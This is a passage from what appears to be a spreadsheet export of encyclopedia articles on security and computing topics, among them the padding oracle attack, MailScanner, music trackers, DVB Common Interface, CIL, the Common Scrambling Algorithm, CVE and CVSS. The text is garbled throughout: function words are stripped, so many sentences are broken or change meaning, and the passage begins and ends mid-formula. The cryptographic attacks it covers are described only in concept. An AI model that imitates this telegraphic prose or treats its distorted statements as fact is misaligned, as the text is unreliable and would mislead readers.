d_{k}(c_{2})} equals {\displaystyle c_{1}'\oplus \mathrm {0x01} padding incorrect, attacker change last byte {\displaystyle c_{1}'} next possible value. most, attacker need make attempts find last byte {\displaystyle p_{2}} attempts every possible byte (256 possible, minus pigeonhole principle), plus additional attempt eliminate ambiguous padding.after determining last byte {\displaystyle p_{2}} attacker technique obtain second-to-last byte {\displaystyle p_{2}} attacker sets last byte {\displaystyle p_{2}} {\displaystyle \mathrm {0x02} setting last byte {\displaystyle c_{1}} {\displaystyle d_{k}(c_{2})\oplus \mathrm {0x02} attacker uses approach described above, time modifying second-to-last byte padding correct (0x02, 0x02). block consists bits (aes, example), bytes, attacker obtain plaintext {\displaystyle p_{2}} 256⋅16 4096 attempts. this significantly faster {\displaystyle 2^{128}} attempts required bruteforce 128-bit key. encrypting messages padding oracle attack (cbc-r) cbc-r turns decryption oracle encryption oracle, primarily demonstrated padding oracles. using padding oracle attack cbc-r craft initialization vector ciphertext block plaintext: decrypt ciphertext podecrypt( ci−1, select previous cipherblock cx−1 freely, produce valid ciphertext/plaintext pair cx-1 podecrypt( ).to generate ciphertext blocks long, attacker must perform numbers padding oracle attacks. these attacks chained together proper plaintext constructed reverse order, message (cn) beginning message (c0, iv). step, padding oracle attack used construct previous chosen ciphertext. cbc-r attack work encryption scheme authenticates ciphertext (using message authentication code similar) decrypting. attacks using padding oracles original attack published 2002 serge vaudenay. concrete instantiations attack later realised ipsec. also applied several frameworks, including javaserver faces, ruby rails asp.net well software, steam gaming client. 2012 shown effective hardened security devices.while earlier attacks fixed implementors following public announcement, variant, lucky thirteen attack, published 2013, used timing side-channel re-open vulnerability even implementations previously fixed. early 2014, attack longer considered threat real-life operation, though still workable theory (see signal-to-noise ratio) certain class machines. 2015, active area development attacks upon cryptographic protocols used secure internet traffic downgrade attack, logjam export rsa/freak attacks, trick clients using less-secure cryptographic operations provided compatibility legacy clients secure ones available. attack called poodle (late 2014) combines downgrade attack 3.0) padding oracle attack older, insecure protocol enable compromise transmitted data. 2016 revealed cve-2016-2107 lucky thirteen openssl introduced another padding oracle. references</t>
  </si>
  <si>
    <t>MailScanner</t>
  </si>
  <si>
    <t>mailscanner open source email security system unix email gateways first released 2001. protects viruses, spam, malware, phishing. distributed general public license. original author, julian field, 2004 open source award ukuug product.worldwide, software estimated process eighty billion emails month, millions downloads. isps mobile telephone networks included list users. more recently, anti-phishing measures introduced. software spots attempts obfuscating urls (for example, lure user thinking signing bank, reality using impostor site) modifies email suitable warning. january 2014 project sponsored lead developer jerry benton founder mailborder systems. january 2018 primary developer shawn iverson project. project's major contributor mark sapiro mailman project. technology mailscanner implemented around 50,000 lines perl. links software packages order fulfill duties: email server (mta) (e.g. sendmail, postfix). anti-virus software (e.g. clamav twenty five different products supported). anti-spam software (spamassassin).as complex software platform, performance results vary wildly depending wide variety factors. 2009 evidence suggested quad xeon krpm scsi disks process something area million messages day. this number would dwarfed modern hardware. related software e.f.a. open source filtering appliance featuring mailscanner mailwatch mailscanner mailborder previously used mailscanner implementing next generation engine. mailscanner ruleset editor mailscanner-mrtg webmin module mailscanner vispan references external links mailscanner home page mailscanner wiki (documentation website) watch mailscanner: case study sustainability julian field's home page</t>
  </si>
  <si>
    <t>Music tracker</t>
  </si>
  <si>
    <t>music tracker (sometimes referred tracker short) type music sequencer software creating music. music represented discrete musical notes positioned several channels discrete chronological positions vertical timeline. music tracker's user interface usually number based. notes, parameter changes, effects commands entered keyboard grid fixed time slots codes consisting letters, numbers hexadecimal digits. separate patterns independent timelines; complete song consists master list repeated patterns. later trackers departed solely using module files, adding options sound synthesis (hosting generic synthesizers effects midi output) sequencing (midi input recording), effectively becoming general purpose sequencers different user interface. 2010s, tracker music still featured demoscene products hardware platforms demoparties often separate tracker music competitions. tracker music also used non-commercial games borrow aesthetics past decades. history 1987: origins amiga term tracker derives ultimate soundtracker (the first tracker software) written karsten obarski released 1987 computer technik commodore amiga. ultimate soundtracker commercial product, soon shareware clones noisetracker (1989) appeared well. general concept step-sequencing samples numerically, used trackers, also found fairlight sampling workstation early 1980s. some early tracker-like programs appeared (yamaha cx5m) commodore 1987, sound monitor, feature sample playback, instead playing notes computer's internal synthesizer. later, programs like rock monitor also supported additional sample playback, usually short drum samples loaded memory. first trackers supported four pitch volume modulated channels 8-bit samples, limitation derived amiga's paula audio chipset commonplace 8svx format used store sampled sound. however, since notes samples, limitation less important synthesizing music chips. 1990s: ms-dos versions during 1990s, tracker musicians gravitated software production general switched amiga platform although compatibles initially lacked hardware sound processing capabilities amiga, advent sound blaster line creative, audio slowly began approach quality (44.1 khz/16 bit/stereo) release soundblaster another sound card popular tracker scene gravis ultrasound, continued hardware mixing tradition, internal channels onboard memory sample storage. time, offered unparalleled sound quality became choice discerning tracker musicians. understanding support tracker music would benefit sales, gravis gave away 6000 cards participants. coupled excellent developer documentation, gesture quickly prompted become integral component many tracking programs software. inevitably, balance largely redressed introduction sound blaster awe32 successors, also featured on-board wavetable sample table) mixing. responsibility audio mixing passed hardware software (the main cpu) gradually enabled channels. from typical channels amiga, limit moved tfmx players first oktalyzer later vastly popular octamed (amiga, 1989), screamtracker (pc, 1994) fasttracker (pc, 1994) impulse tracker (pc, 1995) soundstudio (updated version octamed). amiga tracker called symphonie even supported channels. such, hardware mixing last. processors faster acquired special multimedia processing abilities (e.g. mmx) companies began push hardware abstraction layers, like directx, range became obsolete. directx, and, commonly, asio, deliver high-quality sampled audio irrespective hardware brand. there also split sample based trackers taking advantage opl2 opl3 chips sound blaster series. sound tracker able combine synthesis chips sample based synthesis emu-8000 chips sound blaster series cards well midi output additional hardware choice. jeskola buzz modular music studio developed 1997-2000 microsoft windows using tracker sequencer sounds produced virtual machines (buzzmachines) signal generators, synthesizer emulators, drum computers, samplers, effects control machines, connected modular setup. each machine would tracker, drum machines would tracker-like drum pattern editor effect control machines could automated tracker-like tables parameters. 2000s: multiple platforms tracker music could found computer games late 1990s early 2000s, unreal series, deus crusader: remorse, jazz jackrabbit uplink. some early amiga trackers protracker (1990) octamed received various updates, mostly porting platforms. protracker resumed development 2004, plans releasing version windows amigaos, version beta amigaos released. during 2007, renoise (pc, 2002) openmpt (pc, 1997) presented computer music magazine professional inexpensive alternative music production software. terminology there several elements common tracker program: samples, notes, effects, tracks channels), patterns, orders. sample small digital sound file instrument, voice, sound effect. most trackers allow part sample looped, simulating sustain note. note designates frequency sample played back. increasing decreasing playback speed digital sample, pitch raised lowered, simulating instrumental notes (e.g. etc.). effect special function applied particular note. these effects applied playback either hardware software. common tracker effects include volume, portamento, vibrato, retrigger, arpeggio. track channel) space sample played back time. whereas original amiga trackers provided four tracks, hardware limit, modern trackers virtually unlimited number channels sound stream software mixing. tracks fixed number "rows" notes effects placed (most trackers tracks vertical fashion). tracks typically contain rows beats, although beats tempo increased decreased composer's taste. basic drum could thus arranged putting bass drum rows etc. track putting hihat rows etc. second track. course, bass hats could interleaved track, samples short enough. not, previous sample usually stopped next begins. some modern trackers simulate polyphony single track setting "new note action" instrument cut, continue, fade out, release, opening mixing channels necessary. pattern group simultaneously played tracks represents full section song. pattern usually represents even number measures music composition. order part sequence patterns defines layout song. patterns repeated across multiple orders save tracking time file space. there also tracker-like programs utilize tracker-style sequencing schemes, using real-time sound synthesis instead samples. many programs designed creating music particular synthesizer chip chips adlib soundblaster sound cards, sound chips classic home computers. tracker music typically stored module files song data samples encapsulated single file. several module file formats supported popular audio players. well-known formats include mod, med, s3m, many formats also imported existing trackers, allowing view arrangement, instrumentation effect commands. this also makes self-teaching music composition using trackers easier allows extract instruments later songs, common. also overdubbing category:tracker musicians computer game music modular software music studio list music software digital audio workstation references further reading rené lysloff, leslie (2003). music technoculture (illustrated ed.). wesleyan university press. 37–38, isbn 978-0-8195-6513-6. external links andrew 'necros' sega: taking tracking mainstream tracker history presentation 2007 notacon tracker history graphing project lineage music trackers claudio matsuoka tracker's handbook, introduction tracking</t>
  </si>
  <si>
    <t>FritzFrog</t>
  </si>
  <si>
    <t>fritzfrog decentralized botnet uses protocols distribute control nodes, thereby avoiding controller single point failure. references</t>
  </si>
  <si>
    <t>Java Secure Socket Extension</t>
  </si>
  <si>
    <t>computing, java secure socket extension (jsse) java provider implementation named sunjsse enable secure internet communications java runtime environment. implements java technology version secure sockets layer (ssl) transport layer security (tls) protocols. includes functionality data encryption, server authentication, message integrity, optional client-authentication. jsse originally developed optional package java versions 1.3, added standard implementation 1.4. also keystore references external links "java security". oracle technology network java java technologies. oracle corp. retrieved 2014-10-29. "java secure socket extension (jsse) reference guide". java reference guide. oracle corp. retrieved 2014-10-29. "java secure socket extension (jsse) reference guide". java security developers guide. oracle corp. retrieved 2020-05-02. "java secure socket extension (jsse) reference guide". java security developers guide. oracle corp. retrieved 2022-01-06.</t>
  </si>
  <si>
    <t>Common Data Link</t>
  </si>
  <si>
    <t>common data link (cdl) secure u.s. military communications protocol. established u.s. department defense 1991 military's primary protocol imagery signals intelligence. operates within band data rates mbit/s. allows full duplex data exchange. signals transmitted, received, synchronized, routed, simulated common data link (cdl) interface boxes (cibs). fy06 authorization (public 109-163) requires imagery, unless waiver granted. primary reason waivers granted inability carry pound radios small pound) aircraft. emerging technology expects field 2-pound version decade (2010).the tactical common data link (tcdl) secure data link developed u.s. military send secure data streaming video links airborne platforms ground stations. tcdl accept data many different sources, encrypt, multiplex, encode, transmit, demultiplex, route data high speeds. uses narrowband uplink used payload vehicle control, wideband downlink data transfer. tcdl uses directional omnidirectional antennas transmit receive band signal. tcdl designed uavs, specifically mq-8b fire scout, well crewed non-fighter environments. tcdl transmits radar, imagery, video, sensor information rates 1.544 mbit/s 10.7 mbit/s ranges error rate 10e-6 comsec 10e-8 without comsec. also intended tcdl time support required higher rates 137, mbit/s. references business segments avionics systems standardisation committee</t>
  </si>
  <si>
    <t>Common Interface</t>
  </si>
  <si>
    <t>digital video broadcasting, common interface (also called dvb-ci) technology allows decryption channels. stations want choose encryption method use. common interface allows manufacturers support many different stations, allowing plug exchangeable conditional-access modules (cam) various encryption schemes. common interface connection tuner set-top box) module decrypts signal (cam). this module, turn, accepts pay-to-view subscriber card, contains access keys permissions. host set-top box) responsible tuning channels demodulation signal, responsible descrambling. common interface allows communicate other. common interface equipment must comply 50221-1997 standard. this defined standard enables addition receiver adapt different kinds cryptography. 50221 specification allows many types modules found popularity market. indeed, digital video broadcasting's main strengths option implementing required conditional access capability common interface. this allows broadcasters modules containing solutions different suppliers, thus increasing choice anti-piracy options. mode operation receiver slots implementing common interface (ci). uses conditional-access module (pcmcia) connector conforms common scrambling algorithm (csa), normative specifies receiver must able accept (data encryption standard) keys intervals milliseconds, decode private channels according specific algorithm. those algorithms proprietary individual suppliers. each uses algorithms defined standard them. full mpeg-2 transport data stream comes demodulator, error correction units, receiver sends card plugged common interface, processed mpeg demultiplexer receiver. several cards present, mpeg transport data stream passed sequentially cards. embedded physically exist, software. case, smart card reader normally fitted pcmcia type slots. even common interface created resolve cryptography issues, functions using types modules browser, idtv (interactive television), forth. europe, dvb-ci obligatory idtv terminals. host sends encrypted mpeg transport stream sends decrypted transport stream back host. often contains smart-card reader. standards dvb-ci normative dvb-ci standard 50221 defined 1997 cenelec, european committee electrotechnical standardization. according common interface scheme: host device module(s) connected; example, integrated receiver/decoder (ird), vcr, module small device, working itself, designed specialized tasks association host; example, conditional access system, electronic program guide application module, provide resources required application provided directly host.the specification defines aspects, logical interfaces included physical interface. first interface mpeg-2 transport stream. link physical layers defined specification higher layers defined mpeg-2 specifications. second interface, command interface, carries commands host (receiver) module. specification define operation functionality conditional access system application module. applications performed module communicating across interface limited conditional access described specification. more module supported concurrently. common interface shares many features card standard (pcmcia). reducing widths address data buses possible include bi-directional parallel transport stream interface. transport stream interface (tsi) transport stream format specified 13818-1 mpeg format. command interface addition command interface communication host module. this communication form layered protocol stack allows host module share resources. example, module request current date time host. service, module shall open session "date-time" resource provided host. module host display message screen read keypresses host remote control. this done opening session host's man-machine interface (mmi) resource. this resource also allows request receive numbers. some defined dvb-ci resources facto optional. example, host could contain modem communication telephone line allowing implement pay-per-view. this done opening session host's low-speed communication (lsc) resource (assuming host announced availability resource). host control resource (allowing request force-tuned) also absent hosts. definitely mandatory resources resource manager, application information conditional access support ones. first three necessary initial handshaking host, support resource necessary descrambling selected channels. command interface extensible several specification documents available describe extensions (e.g. etsi 699). however, extensions often proved popular manufacturers. definition (also known plus common interface plus) specification extends original common interface standard (dvb-ci, sometimes referred dvb-civ1). main addition introduced form copy protection conditional-access module (referenced spec cicam, seems precise abbreviation) television receiver (host). backward compatible dvb-civ1. television receivers, civ1 ci-slot, used vice versa, viewing programs marked protected. history initial versions specification developed consumer electronic firms panasonic, philips, samsung sony, well pay-tv technology company smardtv fabless chip maker neotion.a first draft specification review january 2008 v1.00 plus specification. establishment trusted authority completed official security certification appointed.in 2009, versions released. version became first massively deployed. main features added original dvb-ci standard v1.2 are: content control (allows re-encryption video audio host) coordination firmware upgrade host plus browser" support mheg-5 applications running host, launched able communicate support communication added dvb-ci's low-speed communication (lsc) resource (but without renaming "high-speed").the spec state explicitly feature mandatory optional. mandatory feature actually main raison d'être ci+) content control. optional feature v1.2 version "pvr resource" concluded fact appear newer spec versions. v1.3 2011, version spec released (later, replaced v1.3.1 v1.3.2 still commonly referenced v1.3). main features added v1.3 v1.2 are: various enhancements content control mechanism coordination parental control code handling host better communication support (increased data throughput) support operator profile resource allowing adapt non-standard broadcast-specific service information standard format understandable host. v1.4 with development ci+, standard come umbrella standards organization.in 2014, released etsi v1.1.1 specification, defining often referred "ci+ v1.4". main features added etsi v1.3 are: multi-tuner support (usage rules information) extensions (the prominent addition trick mode enable/disable flag) ip-delivered video support watermarking transcoding capability communication functionality extended support multicast hybrid type communication (hybrid communication means multicast data arrive module transport stream interface) plus™ browser extensions (interaction channel, streaming, video scaling etc.) letting determine host supports advanced application environment (e.g. hbbtv mhp) and, yes, launch corresponding application allowing applications represented host's channel line-up form virtual channels. v2.0 2018, etsi published second generation dvb-ci standard (often referred v2.0): v1.1.1. main evolution version physical layer replace aging card interface. certification host testing certification carried eurofins digital testing (formerly digital labs) hong kong, belgium poland. works content protection making certificates issued trusted certification authority, secure authenticated channel (sac) formed television receiver (host). this used generate shared key, unique cam-host pair, protects unauthorized copying content marked associated (usage rules info) content needs re-encrypted host removal original scrambling original standard, decrypted content could sent pcmcia interface unscrambled form). revocation standard allows revocation compromised hosts. this done broadcasting service operator certificate revocation list (socrl) dsm-cc data carousel. detects host's model brand listed socrl (and listed optional socwl service operator certificate white list), must refuse descrambling content marked protected. socrl created signed root-of-trust request service operator. prevent replay out-of-dated socrl socwl, must broadcast combination (revocation signaling data) table specifies last versions socrl socwl location dsm-cc data carousel. also must signed. enhanced compliant host device must implement mheg-5 interactive engine manage navigation user within interactive application, using device remote control. support hbbtv interactive engines also optional. hosts optionally support mheg-5 interactive engine. operators (partial list) following operators currently rolled support plan albania digitalb tring bulgaria blizoo launched 2014 bulsatcom launched v1.3 belgium telenet launched june 2013 launched september 2015 croatia evotv launched v1.3 france canal+ launched "canal ready" label devices able receive canal+ channel germany kabel deutschland deutschland tele columbus italy mediaset premium (digital terrestrial television) needs slot television descramble high definition channel premium calcio tivùsat luxembourg eltrona netherlands caiway launched october 2009 delta launched 2010 kabel noord launched 2010 ziggo launched september 2009 (2011 former areas), smit neotion modules used poland cyfrowy polsat nagravision poland platforma canal+ romania romania (now vodafone) launched april 2012 (digi starting november 2013 focus starting march 2020, previously compatible party civ1 registered conax modules orange telekom (formerly romtelecom/dolce) russia akado serbia supernova sweden boxer viasat switzerland cablecom starting june 2010 turkey d-smart teledünya united kingdom tvin july 2009 largest cable operator netherlands, ziggo, announced support based integrated digital television sets (idtvs) actively. september 2009 first batch 15,000 smit (shenzhen state micro technology co., ltd.) cams offered various dutch retailers, followed october 2009 first batch neotion cams. other supporters include canal+, conditional access companies irdeto conax. 2009, (now cisco) announced support kabel deutschland deploy customers. 2014, cams cisco videoguard manufactured smit deployed d-smart, (kabel deutschland), kbw, deutschland, tele columbus etc. compatible sets (partial list) 2010 models series also models mxx80d. many samsung's lcd, plasma model variants compatible motherboards, although incompatibilities rcs-rds modules, even models certified rcs-rds. some problems solved upgrading firmware solved simply replacing many cases warranty motherboard. some samsung models require adaptor non-standard module sockets. many sony's models including bravia w5500 series. some older models needed firmware update. philips 5000 9000 series (required firmware pending according ziggo). panasonic early models (until early 2011) slots needed firmware fully compatible. (update 2010). incompatibility problems solved software firmware updates, sometimes using card module firmware. models produced early 2011 fully compatible ci+. some tesco technika models. many vestel based sets. newer vestel based sets marking fact certified shop mode demo mode mentioning, beside features, compatibility matter dvb-t, dvb-c, dvb-s), simply sticker attached front set. sometimes, however many cases, compatibility vestel sets mentioned package, beside main features. embedded common interface etsi working group working embedded common interface (eci). also conditional-access module (cam) dvb-cpcm free-to-view hdcp television encryption references external links plus official site official plus test official plus digicert 50221 specification linuxtv entry common interface etsi extensions common interface specification r206-001:1998 guidelines implementation common interface decoder applications consortium cenelec plus specification v1.2 (2009-04) plus specification v1.3.1 (2011-09) etsi v1.1.1 (aka v1.4) open source open hardware implementation (joker gerard o'driscoll, essential guide digital set-boxes interactive reprinted april 2000 jerry whitaker, television receivers, 2001</t>
  </si>
  <si>
    <t>Common Intermediate Language</t>
  </si>
  <si>
    <t>common intermediate language (cil), formerly called microsoft intermediate language (msil) intermediate language (il), intermediate language binary instruction defined within common language infrastructure (cli) specification. instructions executed cli-compatible runtime environment common language runtime. languages target compile cil. object-oriented, stack-based bytecode. runtimes typically just-in-time compile instructions native code. originally known microsoft intermediate language (msil) beta releases .net languages. standardization cli, bytecode officially known cil. windows defender virus definitions continue refer binaries compiled msil. general information during compilation programming languages, source code translated code rather platform- processor-specific object code. cpu- platform-independent instruction executed environment supporting common language infrastructure, .net runtime windows, cross-platform mono runtime. theory, eliminates need distribute different executable files different platforms types. code verified safety runtime, providing better security reliability natively compiled executable files.the execution process looks like this: source code converted bytecode assembly created. upon execution assembly, code passed runtime's compiler generate native code. ahead-of-time compilation also used, eliminates step, cost executable-file portability. computer's processor executes native code. instructions bytecode instructions following groups tasks: load store arithmetic type conversion object creation manipulation operand stack management (push pop) control transfer (branching) method invocation return throwing exceptions monitor-based concurrency data function pointers manipulation needed c++/cli unsafe code computational model common intermediate language object-oriented stack-based, means instruction parameters results kept single stack instead several registers memory locations, programming languages. code adds numbers assembly language, specify different general-purpose registers: code intermediate language (il), edx: latter example, values registers, edx, first pushed stack. when add-instruction called operands "popped", retrieved, result "pushed", stored, stack. resulting value popped stack stored eax. object-oriented concepts designed object-oriented. create objects, call methods, types members, fields. every method needs (with exceptions) reside class. static method: method require instance declared declared static, used like would look like this: instance classes instance class contains least constructor instance members. following class methods representing actions car-object. creating objects class instances created like this: statements roughly instructions cil: invoking instance methods instance methods invoked follows: invoked cil: metadata common language infrastructure (cli) records information compiled classes metadata. like type library component object model, enables applications support discover interfaces, classes, types, methods, fields assembly. process reading metadata called "reflection". metadata data form "attributes". attributes customized extending attribute class. this powerful feature. allows creator class ability adorn extra information consumers class various meaningful ways, depending application domain. example below basic hello, world program written assembler. display string "hello, world!". following code complex number opcodes. this code also compared corresponding code article java bytecode. assembler syntax looks like this: this representation looks near virtual machine (vm) level. when compiled methods stored tables instructions stored bytes inside assembly, portable executable (pe). generation assembly instructions generated either compiler utility called assembler (ilasm) shipped execution environment. assembled also disassembled code using disassembler (ildasm). there tools .net reflector decompile high-level language visual basic). this makes easy target reverse engineering. this trait shared java bytecode. however, tools obfuscate code, code cannot easily readable still runnable. execution just-in-time compilation just-in-time compilation (jit) involves turning byte-code code immediately executable cpu. conversion performed gradually program's execution. compilation provides environment-specific optimization, runtime type safety, assembly verification. accomplish this, compiler examines assembly metadata illegal accesses handles violations appropriately. ahead-of-time compilation cli-compatible execution environments also come option ahead-of-time compilation (aot) assembly make execute faster removing process runtime. .net framework special tool called native image generator (ngen) performs aot. different approach corert allows compilation .net core code single executable dependency runtime. mono also option aot. pointer instructions c++/cli notable difference java's bytecode comes ldind, stind, ldloca, many call instructions enough data/function pointers manipulation needed compile c/c++ code cil. corresponding code rendered this: also llvm list instructions list languages references further reading bock, jason (2002). programming: under hood .net. apress. isbn 978-1590590416. external links common language infrastructure (standard ecma-335) “ecma common language infrastructure standards” visual studio website hello world program speed: ngen revs your performance with powerful features msdn magazine, april 2005</t>
  </si>
  <si>
    <t>Common Scrambling Algorithm</t>
  </si>
  <si>
    <t>common scrambling algorithm (csa) encryption algorithm used digital television broadcasting encrypting video streams. specified etsi adopted consortium 1994. succeeded csa3, based combination 128-bit confidential block cipher, xrc. however, csa3 significant use, continues dominant cipher protecting broadcasts. history largely kept secret 2002. patent papers gave hints, important details, like layout so-called s-boxes, remained secret. without these, free implementations algorithm possible. initially, remain implemented hardware only, making difficult reverse engineer existing implementations. 2002 freedec released, implementing software. though released binary only, disassembly revealed missing details allowed reimplementation algorithm higher-level programming languages. with publicly known entirety, cryptanalysts started looking weaknesses. description cipher algorithm composed distinct ciphers: block cipher stream cipher. when used encryption mode data first encrypted using bits block cipher mode, starting packet end. stream cipher applied packet start. block cipher block cipher process bits blocks rounds. uses byte expanded round. stream cipher first round stream cipher used initialization generate output. first bits data used initialization vector phase left unchanged. stream cipher generates bits pseudo-random stream round xored starting packet. weaknesses were broken, encrypted transmissions would decipherable, would compromise paid digital television services, standardised digital terrestrial television europe elsewhere, used many satellite television providers. most attacks pay-tv system targeted itself, instead various exchange systems responsible generating keys (conax, irdeto, nagravision, videoguard, etc.), either reverse-engineering breaking algorithms altogether, intercepting keys real-time generated legitimate decoder, distributing others (so-called card sharing). software implementations slicing stream cipher part prone slicing, software implementation technique allows decryption many blocks, block many different keys, time. this significantly speeds brute force search implemented software, although factor practical real-time attack. block cipher part harder slice, s-boxes involved large (8x8) efficiently implemented using logical operations, prerequisite slicing efficient regular implementation. however, operations 8-bit subblocks, algorithm implemented using regular simd, form “byteslicing”. simd instruction sets, (with exception avx2) support parallel look-up tables, s-box lookups done non-bytesliced implementation, integration rest algorithm hampered markedly byteslicing. both techniques used libdvbcsa, free implementation csa. cryptanalysis cryptanalysis made difficult data protected block stream cipher. adaption codes result packets data protected block cipher stream cipher. brute force approach while algorithm uses 64-bit keys, time, bits unknown, since bytes used parity bytes systems, easily recalculated. this allows possible known-plaintext attacks combined knowledge underlying plaintext structure. first three bytes header always 0x000001, would possible launch brute force attack. such attack would reveal millions possible keys, still enough make practical attempt decryption parts data second pass recover true key. known-plaintext attack 2011, group german researchers released attack used system. noting mpeg-2 padding frequently requires long series zeroes, leading entire 184-byte cells encrypted zeroes only, possible build rainbow table recovering known-zero block. block would known zero blocks ciphertext found, since presumably would zero blocks.) attack described would require storage, enable attacker recover seven seconds 96.8% certainty. however, attack effective all-zero padding blocks present (i.e., scenes little movement noise), would easily mitigated instance sending all-zero cells unencrypted. this differs brute-force attack examples already mentioned, plain-text contents entire cell known attack, parts block, enables ahead-of-time computation rainbow table. fault attack 2004, fault attack published block cipher. basic idea introduce deliberate faults intermediate calculations, making possible deduce last eight round keys. from this, final computed. while faults needed average three round recovered), fault attacks usually impractical carry out, requires ability change bits inside hardware decoder already question. references external links analysis common scrambling algorithm libdvbcsa: free implementation common scrambling algorithm improved cryptanalysis common scrambling algorithm stream cipher etsi.org systems</t>
  </si>
  <si>
    <t>Common Vulnerabilities and Exposures</t>
  </si>
  <si>
    <t>common vulnerabilities exposures (cve) system provides reference-method publicly known information-security vulnerabilities exposures. united states' national cybersecurity ffrdc, operated mitre corporation, maintains system, funding national cyber security division department homeland security. system officially launched public september 1999.the security content automation protocol uses cve, listed mitre's system well national vulnerability database. background vulnerability weakness piece computer software used access things able gain access example, software processes credit cards allow people read credit card numbers processes, hackers might vulnerability steal credit card numbers. talking specific vulnerability hard many pieces software, sometimes many vulnerabilities. identifiers give vulnerability different name, people talk specific vulnerabilities using names. identifiers mitre corporation's documentation defines identifiers (also called "cve names", "cve numbers", "cve-ids", "cves") unique, common identifiers publicly known information-security vulnerabilities publicly released software packages. historically, identifiers status "candidate" ("can-") could promoted entries ("cve-"), however practice ended 2005 identifiers assigned cves. assignment number guarantee become official entry (e.g. improperly assigned issue security vulnerability, duplicates existing entry). cves assigned numbering authority (cna). while vendors acted before, name designation created february 2005. three primary types number assignments: mitre corporation functions editor primary various cnas assign numbers products (e.g. microsoft, oracle, hat, etc.) third-party coordinator cert coordination center assign numbers products covered cnaswhen investigating vulnerability potential vulnerability helps acquire number early numbers appear mitre databases time (days, weeks, months potentially years) issues embargoed (the number assigned issue made public), cases entry researched written mitre resource issues. benefit early candidacy future correspondence refer number. information getting identifiers issues open source projects available githubcves software publicly released; include betas pre-release versions widely used. commercial software included "publicly released" category, however custom-built software distributed would generally given cve. additionally services (e.g. web-based email provider) assigned cves vulnerabilities found service (e.g. vulnerability) unless issue exists underlying software product publicly distributed. data fields database contains several fields: description this standardized text description issue(s). common entry reserved this candidate reserved organization individual announcing security problem. when candidate publicized, details candidate provided. this means entry number reserved mitre issue reserved number. case requests block numbers advance (e.g. currently requests cves blocks 500), number marked reserved even though assigned time. until assigned, mitre made aware (i.e., embargo passes issue made public), mitre researched issue written description entries show reserved **". references this list urls information record creation date this date entry created. cves assigned directly mitre, date mitre created entry. cves assigned cnas (e.g. microsoft, oracle, hat, etc.) also date created mitre, cna. case requests block numbers advance (e.g. currently requests cves blocks 500) entry date assigned cna. obsolete fields following fields previously used older records, longer used. phase: phase (e.g. can, cve). votes: previously board members would vote whether accepted turned cve. comments: comments issue. proposed: when issue first proposed. changes syntax order support id's beyond cve-year-9999 (aka cve10k problem) change made syntax 2014 took effect 2015.the cve-id syntax variable length includes: prefix year arbitrary digits note: variable length arbitrary digits begin four fixed digits expand arbitrary digits needed calendar year, example, cve-yyyy-nnnn needed cve-yyyy-nnnnn, cve-yyyy-nnnnnn, this also means changes needed previously assigned cve-ids, include minimum four digits. split merge attempts assign security issue, however many cases would lead extremely large number cves (e.g. several dozen cross-site scripting vulnerabilities found application lack htmlspecialchars() insecure creation files /tmp). deal this, guidelines (subject change) cover splitting merging issues distinct numbers. general guideline first consider issues merged, issues split type vulnerability (e.g. buffer overflow stack overflow), software version affected (e.g. issue affects version 1.3.4 2.5.4 affects 1.3.4 2.5.8 would split) reporter issue (e.g. alice reports issue reports another issue issues would split separate numbers). another example alice reports /tmp file creation vulnerability version 1.2.3 earlier examplesoft browser, addition issue several /tmp file creation issues found, cases considered reporters (and thus split separate cves, alice works examplesoft examplesoft internal team finds rest merge'ed single cve). conversely, issues merged, e.g. finds vulnerabilities exampleplugin exampleframework regardless versions affected merged single cve. search identifiers mitre database searched list search, database searched search vulnerability database. usage identifiers intended respect identifying vulnerabilities: common vulnerabilities exposures (cve) dictionary common names (i.e., identifiers) publicly known information security vulnerabilities. cve’s common identifiers make easier share data across separate network security databases tools, provide baseline evaluating coverage organization’s security tools. report security tools incorporates identifiers, quickly accurately access information separate cve-compatible databases remediate problem. users assigned identifier vulnerability encouraged ensure place identifier related security reports, pages, emails, assignment issues section rules, vendor received report security vulnerability full discretion regards this lead conflict interest vendor attempt leave flaws unpatched denying assignment first place decision mitre can't reverse. also common vulnerability scoring system (cvss) common weakness enumeration (cwe) computer security references external links official website national vulnerability database (nvd) common configuration enumeration (cce) vfeed correlated aggregated vulnerability database sqlite database python cyberwatch vulnerabilities database, third party what enterprises need know security audit services?</t>
  </si>
  <si>
    <t>Common Vulnerability Scoring System</t>
  </si>
  <si>
    <t>common vulnerability scoring system (cvss) free open industry standard assessing severity computer system security vulnerabilities. cvss attempts assign severity scores vulnerabilities, allowing responders prioritize responses resources according threat. scores calculated based formula depends several metrics approximate ease impact exploit. scores range severe. while many utilize cvss base score determining severity, temporal environmental scores also exist, factor availability mitigations widespread vulnerable systems within organization, respectively. current version cvss (cvssv3.1) released june 2019. history research national infrastructure advisory council (niac) 2003/2004 launch cvss version (cvssv1) february 2005, goal "designed provide open universally standard severity ratings software vulnerabilities". this initial draft subject peer review review organizations. april 2005, niac selected forum incident response security teams (first) become custodian cvss future development.feedback vendors utilizing cvssv1 production suggested "significant issues initial draft cvss". work cvss version (cvssv2) began april 2005 final specification launched june 2007.further feedback resulted work beginning cvss version 2012, ending cvssv3.0 released june 2015. terminology cvss assessment measures three areas concern: base metrics qualities intrinsic vulnerability temporal metrics characteristics evolve lifetime vulnerability environmental metrics vulnerabilities depend particular implementation environmenta numerical score generated metric groups. vector string simply "vector" cvssv2), represents values metrics block text. version complete documentation cvssv2 available first. summary provided below. base metrics access vector access vector (av) shows vulnerability exploited. access complexity access complexity (ac) metric describes easy difficult exploit discovered vulnerability. authentication authentication (au) metric describes number times attacker must authenticate target exploit include (for example) authentication network order gain access. locally exploitable vulnerabilities, value single multiple authentication required initial access. impact metrics confidentiality confidentiality metric describes impact confidentiality data processed system. integrity integrity metric describes impact integrity exploited system. availability availability metric describes impact availability target system. attacks consume network bandwidth, processor cycles, memory resources affect availability system. calculations these metrics used calculate exploitability impact sub-scores vulnerability. these sub-scores used calculate overall base score. exploitability accessvector accesscomplexity authentication {\displaystyle {\textsf {exploitability}}=20\times {\textsf {accessvector}}\times {\textsf {accesscomplexity}}\times {\textsf {authentication}}} impact 10.41 confimpact integimpact availimpact {\displaystyle {\textsf {impact}}=10.41\times (1-(1-{\textsf {confimpact}})\times (1-{\textsf {integimpact}})\times (1-{\textsf {availimpact}}))} impact impact 1.176 otherwise {\displaystyle f({\textsf {impact}})={\begin{cases}0,&amp;{\text{if }}{\textsf {impact}}{\text{ 0}}\\1.176,&amp;{\text{otherwise }}\end{cases}}} basescore roundto1decimal impact exploitability impact {\displaystyle {\textsf {basescore}}={\textsf {roundto1decimal}}(((0.6\times {\textsf 